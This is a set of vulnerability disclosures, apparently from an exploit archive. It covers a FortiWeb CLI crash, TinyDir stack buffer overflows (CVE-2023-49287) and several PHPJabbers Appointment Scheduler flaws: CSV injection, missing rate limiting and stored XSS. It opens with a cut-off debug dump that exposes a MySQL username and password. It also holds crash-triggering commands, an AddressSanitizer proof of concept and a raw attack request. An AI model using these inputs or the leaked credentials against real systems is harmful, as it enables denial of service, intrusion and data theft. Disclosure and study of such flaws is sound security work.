"utf8mb4_unicode_ci"<br /> "database" => "soft_pw3qsny"<br /> "driver" => "mysql"<br /> "engine" => "InnoDB"<br /> "host" => "localhost"<br /> "options" => []<br /> "password" => "8QSz9(pT)3"<br /> "port" => 3306<br /> "prefix" => ""<br /> "prefix_indexes" => true<br /> "strict" => true<br /> "unix_socket" => ""<br /> "url" => null<br /> "username" => "soft_pw3qsny"<br /> ]<br /> "pgsql" => array:12 [▶]<br /> "sqlsrv" => array:10 [▶]<br /> ]<br /> "migrations" => "migrations"<br /> "redis" => array:4 [▼<br /> "client" => "phpredis"<br /> "options" => array:2 [▼<br /> "cluster" => "redis"<br /> "prefix" => "winter_database_"<br /> ]<br /> "default" => array:5 [▼<br /> "database" => "0"<br /> "host" => "127.0.0.1"<br /> "password" => null<br /> "port" => "6379"<br /> "url" => null<br /> ]<br /> "cache" => array:5 [▼<br /> "database" => "1"<br /> "host" => "127.0.0.1"<br /> "password" => null<br /> "port" => "6379"<br /> "url" => null<br /> ]<br /> ]<br /> ]<br /> ]<br /></code></pre>
<pre><code>;; <br />;; FortiWeb VM (v7.4.0 build577) Post-auth CLI Crash<br />;; <br />;; (...)<br />;; <br />;; code610 / some debug notes fyi<br />;; <br />;; 17.11.2023 @ 23:33<br />;; <br /><br />FortiWeb # diagnose debug crashlog show<br />2023-11-16 05:07:00 <004315> application cli<br />2023-11-16 05:07:00 <004315> *** signal Segmentation fault received ***<br />2023-11-16 05:07:00 <004315> RIP 00007fdd1febf44f<br />2023-11-16 05:07:00 <004315> EFLAGS 0000000000010206<br />2023-11-16 05:07:00 <004315> RAX 0000000000000000<br />2023-11-16 05:07:00 <004315> RBX 0000000000000005<br />2023-11-16 05:07:00 <004315> RCX 00005642dd55d4b1<br />2023-11-16 05:07:00 <004315> RDX 00007ffca74d8ff0<br />2023-11-16 05:07:00 <004315> RSI 0000000000000000<br />2023-11-16 05:07:00 <004315> RDI 00007ffca74d82d0<br />2023-11-16 05:07:00 <004315> RBP 0000000000000000<br />2023-11-16 05:07:00 <004315> RSP 00007ffca74d8208<br />2023-11-16 05:07:00 <004315> CS 0000<br />2023-11-16 05:07:00 <004315> GS 0000<br />2023-11-16 05:07:00 <004315> FS 0033<br />2023-11-16 05:07:00 <004315> Trap 000000000000000e<br />2023-11-16 05:07:00 <004315> Error 0000000000000006<br />2023-11-16 05:07:00 <004315> Oldmask 0000000000000000<br />2023-11-16 05:07:00 <004315> CR2 00007ffca74d9020<br />2023-11-16 05:07:00 <004315> [0x00007fdd1febf44f] ==> /lib64/libc.so.6 + 0x000000000013d44f)<br />2023-11-16 05:07:00 <004315> [0x00007fdd21329ae3] => /lib64/libconfd.so (cfg_backup+0x00000193)<br />2023-11-16 05:07:00 <004315> [0x00007fdd21329ae3] => /lib64/libconfd.so (cfg_backup+0x00000193)<br />2023-11-16 05:07:38 <004315> application cli<br />2023-11-16 05:07:38 <004315> *** signal Segmentation fault received ***<br />2023-11-16 05:07:38 <004315> RIP 00007fdd1fec034f<br />2023-11-16 05:07:38 <004315> EFLAGS 0000000000010206<br />2023-11-16 05:07:38 <004315> RAX 0000000000000000<br />2023-11-16 05:07:38 <004315> RBX 0000000000000006<br />2023-11-16 05:07:38 <004315> RCX 00005642dd55403b<br />2023-11-16 05:07:38 <004315> RDX 00007ffca74d8fe0<br />2023-11-16 05:07:38 <004315> RSI 0000000000000000<br />2023-11-16 05:07:38 <004315> RDI 00007ffca74d82d0<br />2023-11-16 05:07:38 <004315> RBP 0000000000000000<br />2023-11-16 05:07:38 <004315> RSP 00007ffca74d8208<br />2023-11-16 05:07:38 <004315> CS 0000<br />2023-11-16 05:07:38 <004315> GS 0000<br />2023-11-16 05:07:38 <004315> FS 0033<br />2023-11-16 05:07:38 <004315> Trap 000000000000000e<br />2023-11-16 05:07:38 <004315> Error 0000000000000006<br />2023-11-16 05:07:38 <004315> Oldmask 0000000000000000<br />2023-11-16 05:07:38 <004315> CR2 00007ffca74d9010<br />2023-11-16 05:07:38 <004315> [0x00007fdd1fec034f] ==> /lib64/libc.so.6 + 0x000000000013e34f)<br />2023-11-16 05:07:38 <004315> [0x00007fdd21329ae3] => /lib64/libconfd.so (cfg_backup+0x00000193)<br />2023-11-16 05:07:38 <004315> [0x00007fdd21329ae3] => /lib64/libconfd.so (cfg_backup+0x00000193)<br />2023-11-16 05:08:00 <004315> application cli<br />2023-11-16 05:08:00 <004315> *** signal Segmentation fault received ***<br />2023-11-16 05:08:00 <004315> RIP 00007fdd1febf284<br />2023-11-16 05:08:00 <004315> EFLAGS 0000000000010246<br />2023-11-16 05:08:00 <004315> RAX 0000000000000000<br />2023-11-16 05:08:00 <004315> RBX 0000000000000006<br />2023-11-16 05:08:00 <004315> RCX 00005642dd558a80<br />2023-11-16 05:08:00 <004315> RDX 00007ffca74d9030<br />2023-11-16 05:08:00 <004315> RSI ffffffffffffffc0<br />2023-11-16 05:08:00 <004315> RDI 00007ffca74d82d0<br />2023-11-16 05:08:00 <004315> RBP 0000000000000000<br />2023-11-16 05:08:00 <004315> RSP 00007ffca74d8208<br />2023-11-16 05:08:00 <004315> CS 0000<br />2023-11-16 05:08:00 <004315> GS 0000<br />2023-11-16 05:08:00 <004315> FS 0033<br />2023-11-16 05:08:00 <004315> Trap 000000000000000e<br />2023-11-16 05:08:00 <004315> Error 0000000000000006<br />2023-11-16 05:08:00 <004315> Oldmask 0000000000000000<br />2023-11-16 05:08:00 <004315> CR2 00007ffca74d9000<br />2023-11-16 05:08:00 <004315> [0x00007fdd1febf284] ==> /lib64/libc.so.6 + 0x000000000013d284)<br />2023-11-16 05:08:00 <004315> [0x00007fdd21329ae3] => /lib64/libconfd.so (cfg_backup+0x00000193)<br />2023-11-16 05:08:00 <004315> [0x00007fdd21329ae3] => /lib64/libconfd.so (cfg_backup+0x00000193)<br /><br /><br />FortiWeb # ;; version: FortiWeb VM (v7.4.0 build577) <br /><br /><br /><br />;; quick poc:<br /><br />fgweb_cli> execute backup cli-config tftp SOMEFILENAME 1.1.1.1 PASSWD_LEN_IS_OUR_CRASHER <br /><br />;; <br />;; https://code610.blogspot.com/search?q=fortigate<br />;; <br /></code></pre>
<pre><code>--[ HNS-2023-04 - HN Security Advisory - https://security.humanativaspa.it/<br /><br />* Title: Buffer overflow vulnerabilities with long path names in TinyDir<br />* Product: TinyDir <= 1.2.5<br />* Author: Marco Ivaldi <marco.ivaldi@hnsecurity.it><br />* Date: 2023-12-04<br />* CVE ID: CVE-2023-49287<br />* Severity: High - 7.7 - CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H<br />* Vendor URL: https://github.com/cxong/tinydir<br />* Advisory URL: https://github.com/cxong/tinydir/security/advisories/GHSA-jf5r-wgf4-qhxf<br /><br /><br />--[ 0 - Table of contents<br /><br />1 - Summary<br />2 - Background<br />3 - Vulnerabilities<br />4 - Proof of concept<br />5 - Affected products<br />6 - Remediation<br />7 - Disclosure timeline<br />8 - Acknowledgements<br />9 - References<br /><br /><br />--[ 1 - Summary<br /><br />"This is the OG we all want to be, congrats on 20yrs of (public) vulns!"<br /> -- Erik Cabetas<br /><br />TinyDir is a lightweight, portable and easy to integrate C directory and<br />file reader. It wraps dirent for POSIX and FindFirstFile for Windows.<br /><br />We reviewed TinyDir's source code hosted on GitHub [1] and identified some<br />security vulnerabilities that may cause memory corruption. Their impacts<br />range from denial of service to potential arbitrary code execution.<br /><br /><br />--[ 2 - Background<br /><br />While auditing another codebase, we noticed that it included TinyDir.<br />Since this small but successful project is used in hundreds of repositories<br />[2], we decided to review it in search of security bugs.<br /><br /><br />--[ 3 - Vulnerabilities<br /><br />We spotted some buffer overflow vulnerabilities with long path names in the<br />tinydir_file_open() function, at the marked locations in the following<br />source code listing:<br /><br />```c<br />/* Open a single file given its path */<br />_TINYDIR_FUNC<br />int tinydir_file_open(tinydir_file *file, const _tinydir_char_t *path)<br />{<br /> tinydir_dir dir;<br /> int result = 0;<br /> int found = 0;<br /> _tinydir_char_t dir_name_buf[_TINYDIR_PATH_MAX];<br /> _tinydir_char_t file_name_buf[_TINYDIR_FILENAME_MAX];<br /> _tinydir_char_t *dir_name;<br /> _tinydir_char_t *base_name;<br />#if (defined _MSC_VER || defined __MINGW32__)<br /> _tinydir_char_t drive_buf[_TINYDIR_PATH_MAX];<br /> _tinydir_char_t ext_buf[_TINYDIR_FILENAME_MAX];<br />#endif<br /><br /> if (file == NULL || path == NULL || _tinydir_strlen(path) == 0)<br /> {<br /> errno = EINVAL;<br /> return -1;<br /> }<br /> if (_tinydir_strlen(path) + _TINYDIR_PATH_EXTRA >= _TINYDIR_PATH_MAX)<br /> {<br /> errno = ENAMETOOLONG;<br /> return -1;<br /> }<br /><br /> /* Get the parent path */<br />#if (defined _MSC_VER || defined __MINGW32__)<br />#if ((defined _MSC_VER) && (_MSC_VER >= 1400))<br /> errno = _tsplitpath_s(<br /> path,<br /> drive_buf, _TINYDIR_DRIVE_MAX,<br /> dir_name_buf, _TINYDIR_FILENAME_MAX,<br /> file_name_buf, _TINYDIR_FILENAME_MAX,<br /> ext_buf, _TINYDIR_FILENAME_MAX);<br />#else<br /> _tsplitpath(<br /> path,<br /> drive_buf,<br /> dir_name_buf,<br /> file_name_buf,<br /> ext_buf); /* VULN: potential buffer overflow due to insecure splitpath() API<br /> (https://learn.microsoft.com/en-us/cpp/c-runtime-library/reference/splitpath-wsplitpath?view=msvc-170) */<br />#endif<br /><br /> if (errno)<br /> {<br /> return -1;<br /> }<br /><br />/* _splitpath_s not work fine with only filename and widechar support */<br />#ifdef _UNICODE<br /> if (drive_buf[0] == L'\xFEFE')<br /> drive_buf[0] = '\0';<br /> if (dir_name_buf[0] == L'\xFEFE')<br /> dir_name_buf[0] = '\0';<br />#endif<br /><br /> /* Emulate the behavior of dirname by returning "." for dir name if it's<br /> empty */<br /> if (drive_buf[0] == '\0' && dir_name_buf[0] == '\0')<br /> {<br /> _tinydir_strcpy(dir_name_buf, TINYDIR_STRING("."));<br /> }<br /> /* Concatenate the drive letter and dir name to form full dir name */<br /> _tinydir_strcat(drive_buf, dir_name_buf);<br /> dir_name = drive_buf;<br /> /* Concatenate the file name and extension to form base name */<br /> _tinydir_strcat(file_name_buf, ext_buf); /* VULN: since sizeof(file_name_buf) + sizeof(ext_buf) is larger than<br /> sizeof(file_name_buf), we have a potential stack buffer overflow */<br /> base_name = file_name_buf;<br />#else<br /> _tinydir_strcpy(dir_name_buf, path);<br /> dir_name = dirname(dir_name_buf);<br /> _tinydir_strcpy(file_name_buf, path); /* VULN: since sizeof(file_name_buf) is smaller than the maximum path length, <br /> we have a potential stack buffer overflow */<br /> base_name = basename(file_name_buf);<br />#endif<br /><br /> /* Special case: if the path is a root dir, open the parent dir as the file */<br />#if (defined _MSC_VER || defined __MINGW32__)<br /> if (_tinydir_strlen(base_name) == 0)<br />#else<br /> if ((_tinydir_strcmp(base_name, TINYDIR_STRING("/"))) == 0)<br />#endif<br /> {<br /> memset(file, 0, sizeof * file);<br /> file->is_dir = 1;<br /> file->is_reg = 0;<br /> _tinydir_strcpy(file->path, dir_name);<br /> file->extension = file->path + _tinydir_strlen(file->path);<br /> return 0;<br /> }<br /><br /> /* Open the parent directory */<br /> if (tinydir_open(&dir, dir_name) == -1)<br /> {<br /> return -1;<br /> }<br /><br /> /* Read through the parent directory and look for the file */<br /> while (dir.has_next)<br /> {<br /> if (tinydir_readfile(&dir, file) == -1)<br /> {<br /> result = -1;<br /> goto bail;<br /> }<br /> if (_tinydir_strcmp(file->name, base_name) == 0)<br /> {<br /> /* File found */<br /> found = 1;<br /> break;<br /> }<br /> tinydir_next(&dir);<br /> }<br /> if (!found)<br /> {<br /> result = -1;<br /> errno = ENOENT;<br /> }<br /><br />bail:<br /> tinydir_close(&dir);<br /> return result;<br />}<br />```<br /><br /><br />--[ 4 - Proof of concept<br /><br />Step-by-step instructions to replicate the third vulnerability on Linux:<br /><br />```<br />$ git clone https://github.com/cxong/tinydir<br />$ cd tinydir/samples/<br />$ gcc -g -fsanitize=address -I.. file_open_sample.c -o file_open_sample<br />$ mkdir -p AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/<br />$ ./file_open_sample AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />Path: ./AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />Extension: <br />Is dir? yes<br />Is regular file? no<br />$ ./file_open_sample AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/<br />=================================================================<br />==2533==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffd1ecabeb0 at pc 0x7f37b22544bf bp 0x7ffd1ecaac10 sp 0x7ffd1ecaa3b8<br />WRITE of size 513 at 0x7ffd1ecabeb0 thread T0<br /> #0 0x7f37b22544be in __interceptor_strcpy ../../../../src/libsanitizer/asan/asan_interceptors.cpp:440<br /> #1 0x5625cf301b69 in tinydir_file_open ../tinydir.h:711<br /> #2 0x5625cf3021f4 in main /home/raptor/tinydir/samples/file_open_sample.c:12<br /> #3 0x7f37b1e29d8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58<br /> #4 0x7f37b1e29e3f in __libc_start_main_impl ../csu/libc-start.c:392<br /> #5 0x5625cf3004e4 in _start (/home/raptor/tinydir/samples/file_open_sample+0x24e4)<br /><br />Address 0x7ffd1ecabeb0 is located in stack of thread T0 at offset 4704 in frame<br /> #0 0x5625cf3018c3 in tinydir_file_open ../tinydir.h:641<br /><br /> This frame has 3 object(s):<br /> [48, 4184) 'dir' (line 642)<br /> [4448, 4704) 'file_name_buf' (line 646)<br /> [4768, 8864) 'dir_name_buf' (line 645) <== Memory access at offset 4704 partially underflows this variable<br />HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork<br /> (longjmp and C++ exceptions *are* supported)<br />SUMMARY: AddressSanitizer: stack-buffer-overflow ../../../../src/libsanitizer/asan/asan_interceptors.cpp:440 in __interceptor_strcpy<br />Shadow bytes around the buggy address:<br /> 0x100023d8d780: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00<br /> 0x100023d8d790: 00 00 00 00 00 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2<br /> 0x100023d8d7a0: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2<br /> 0x100023d8d7b0: f2 f2 f2 f2 f2 f2 00 00 00 00 00 00 00 00 00 00<br /> 0x100023d8d7c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00<br />=>0x100023d8d7d0: 00 00 00 00 00 00[f2]f2 f2 f2 f2 f2 f2 f2 00 00<br /> 0x100023d8d7e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00<br /> 0x100023d8d7f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00<br /> 0x100023d8d800: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00<br /> 0x100023d8d810: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00<br /> 0x100023d8d820: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00<br />Shadow byte legend (one shadow byte represents 8 application bytes):<br /> Addressable: 00<br /> Partially addressable: 01 02 03 04 05 06 07 <br /> Heap left redzone: fa<br /> Freed heap region: fd<br /> Stack left redzone: f1<br /> Stack mid redzone: f2<br /> Stack right redzone: f3<br /> Stack after return: f5<br /> Stack use after scope: f8<br /> Global redzone: f9<br /> Global init order: f6<br /> Poisoned by user: f7<br /> Container overflow: fc<br /> Array cookie: ac<br /> Intra object redzone: bb<br /> ASan internal: fe<br /> Left alloca redzone: ca<br /> Right alloca redzone: cb<br /> Shadow gap: cc<br />==2533==ABORTING<br />```<br /><br /><br />--[ 5 - Affected products<br /><br />TinyDir 1.2.5 and earlier versions are affected by the vulnerabilities<br />discussed in this advisory.<br /><br /><br />--[ 6 - Remediation<br /><br />TinyDir developers have released version 1.2.6 [3] that addresses the<br />vulnerabilities discussed in this advisory.<br /><br />Please check the official TinyDir channels for further information about<br />fixes.<br /><br /><br />--[ 7 - Disclosure timeline<br /><br />2023-11-30: Vulnerabilities reported via GitHub security advisories [4].<br />2023-12-01: Proof of concept provided at the request of TinyDir developers.<br />2023-12-02: Vulnerabilities fixed in TinyDir's master branch on GitHub.<br />2023-12-03: TinyDir 1.2.6 released and GitHub advisory published.<br />2023-12-04: GitHub issued CVE-2023-49287 and we published this advisory.<br /><br /><br />--[ 8 - Acknowledgements<br /><br />We would like to thank TinyDir developers for triaging and quickly fixing<br />the reported vulnerabilities.<br /><br /><br />--[ 9 - References<br /><br />[1] https://github.com/cxong/tinydir<br />[2] https://github.com/search?q=tinydir.h&type=code<br />[3] https://github.com/cxong/tinydir/releases/tag/1.2.6<br />[4] https://github.com/cxong/tinydir/security<br /><br /><br />Copyright (c) 2023 Marco Ivaldi and Humanativa Group. All rights reserved.<br /></code></pre>
<pre><code># Exploit Title: PHPJabbers Appointment Scheduler v3.0 - CSV Injection<br /># Date: 19/11/2023<br /># Exploit Author: BugsBD Limited<br /># Discover by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/appointment-scheduler/<br /># Version: v3.0<br /># Tested on: Windows 10, Windows 11, MS Office 2010<br /># CVE-2023-48841<br /><br />Descriptions:<br />PHPJabbers Appointment Scheduler v3.0 is vulnerable to CSV injection<br />vulnerability which allows an attacker to execute remote code. The<br />vulnerability exists due to insufficient input validation on the<br />Unique ID field in the Reservations list that is used to construct a<br />CSV file.<br /><br />Steps to Reproduce:<br />1. Login your panel.<br />2. Go to Options Menu then click Language then click Labels section.<br />3. Now use CSV Injection Payload in any field and go to Import/Export.<br />4. Now click export and open your system.<br /><br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48841)<br /></code></pre>
<pre><code># Exploit Title: PHPJabbers Apointment Scheduler v3.0 - No Rate Limit in Email<br /># Date: 19/11/2023<br /># Exploit Author: BugsBD Limited<br /># Discover by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/appointment-scheduler/<br /># Version: v3.0<br /># Tested on: Windows 10, Windows 11, Linux<br /># CVE-2023-48840<br /><br />Descriptions:<br />PHPJabbers Apointment Scheduler v3.0 is vulnerable to Rate limiting.<br />Rate limiting is implemented in web applications and APIs to prevent<br />abuse, such as brute-force attacks or excessive requests that could<br />lead to resource exhaustion. When a rate limit is bypassed or not<br />properly enforced, it opens the door for attackers to carry out<br />malicious activities more quickly than intended, potentially leading<br />to unauthorized access, data breaches, or service disruption.<br /><br />Steps to Reproduce:<br /><br />1. Request Data:<br /><br />POST /1701529051_590/index.php?controller=pjBaseOptions&action=pjActionAjaxSend<br />HTTP/1.1<br />Host: demo.phpjabbers.com<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)<br />Gecko/20100101 Firefox/119.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate, br<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 426<br />Origin: https://demo.phpjabbers.com<br />Referer: https://demo.phpjabbers.com/1701529051_590/index.php?controller=pjBaseOptions&action=pjActionEmailSettings<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br />Te: trailers<br />Connection: close<br /><br />options_update=1&next_action=pjActionEmailSettings&email=test1%40test.com&value-enum-o_send_email=mail%7Csmtp%3A%3Amail&value-string-o_smtp_host=&value-int-o_smtp_port=25&value-string-o_smtp_user=&value-string-o_smtp_pass=&value-enum-o_smtp_secure=none%7Cssl%7Ctls%3A%3Anone&value-enum-o_smtp_auth=LOGIN%7CPLAIN%3A%3ALOGIN&value-string-o_smtp_sender=&value-string-o_sender_email=test%40test.com&value-string-o_sender_name=Test<br /><br />2. Send it to intruder and configure then Start Attack and check mail.<br /><br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48840)<br /></code></pre>
<pre><code># Exploit Title: PHPJabbers Appointment Scheduler v3.0 - Multiple Stored XSS<br /># Date: 19/11/2023<br /># Exploit Author: BugsBD Limited<br /># Discover by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/appointment-scheduler/<br /># Version: v3.0<br /># Tested on: Windows 10, Windows 11, Linux<br /># CVE-2023-48839<br /><br />Descriptions:<br />PHPJabbers Appointment Scheduler v3.0 is vulnerable to Multiple Stored<br />Cross-Site Scripting. Multiple Stored XSS is a type of security<br />vulnerability that occurs when an application or website allows an<br />attacker to inject malicious scripts into the content that is<br />permanently stored on the server. Unlike reflected XSS, where the<br />malicious script is embedded in a URL and executed immediately, stored<br />XSS involves the persistent storage of the malicious script on the<br />target server, waiting for unsuspecting users to access the<br />compromised content.<br /><br />Steps to Reproduce:<br />1. Login your panel.<br />2. Vulnerable parameters are "name, plugin_sms_api_key,<br />plugin_sms_country_code, calendar_id, title, country name,<br />customer_name".<br />3. Go to System Menu then click SMS Settings.<br />4. Then use any XSS Payload in "SMS API Key", "Default Country Code"<br />input field and Save.<br />5. You will see popup.<br /><br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48839)<br /></code></pre>